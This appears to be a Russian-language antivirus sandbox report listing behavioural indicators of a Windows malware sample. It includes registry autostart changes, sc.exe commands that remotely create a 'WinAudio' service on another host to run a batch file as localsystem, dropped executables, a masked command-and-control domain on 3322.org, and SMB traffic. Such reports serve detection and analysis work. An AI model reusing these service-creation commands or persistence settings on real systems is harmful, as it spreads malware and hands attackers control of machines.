Техническая информация
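- [<HKLM>\SYSTEM\ControlSet001\Services\WinAudio] 'Start' = '00000002' (значение 2 соответствует SERVICE_AUTO_START: служба запускается автоматически при загрузке системы)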
- <SYSTEM32>\rundll32.exe 107.URL main
- <SYSTEM32>\sc.exe \\10.0.1.2 config "WinAudio" binpath= "cmd.exe /c "%PROGRAM_FILES%\%PROGR~1\Cest.bat"" start= auto type= interact type= own obj= localsystem password= ""
- <SYSTEM32>\sc.exe \\10.0.1.2 create "WinAudio" binpath= "cmd.exe /c "%PROGRAM_FILES%\%PROGR~1\Cest.bat"" start= auto type= interact type= own displayname= "WinAudio"
- <SYSTEM32>\rundll32.exe <SYSTEM32>\shimgvw.dll,ImageView_Fullscreen "%TEMP%\848ZMA9Q77GEL_4N)XJYCA3.jpg"
- <SYSTEM32>\cmd.exe /c ""%PROGRAM_FILES%\%Program Files%\Dest.bat""
- %PROGRAM_FILES%\%Program Files%\107.URL
- %PROGRAM_FILES%\%Program Files%\105.URL
- %PROGRAM_FILES%\%Program Files%\Dest.BAt
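- \Device\LanmanRedirector\10.0.1.2\pipe\svcctl (именованный канал диспетчера управления службами на удалённом узле 10.0.1.2; через него выполняется удалённая настройка служб, что согласуется с вызовами sc.exe \\10.0.1.2 выше)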
- %PROGRAM_FILES%\%Program Files%\~
- %TEMP%\0yo.exe
- %TEMP%\848ZMA9Q77GEL_4N)XJYCA3.jpg
- C:\ntldr.SYS
- %PROGRAM_FILES%\%Program Files%\Cest.bat
- %PROGRAM_FILES%\%Program Files%\laass.exe
- %TEMP%\0yo.exe
- C:\ntldr.SYS
- 'cx#####012286.3322.org':2011
- '<IP-адрес в локальной сети>':445
- DNS ASK cx#####012286.3322.org
- '<IP-адрес в локальной сети>':1035
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'ShImgVw:CPreviewWnd' WindowName: ''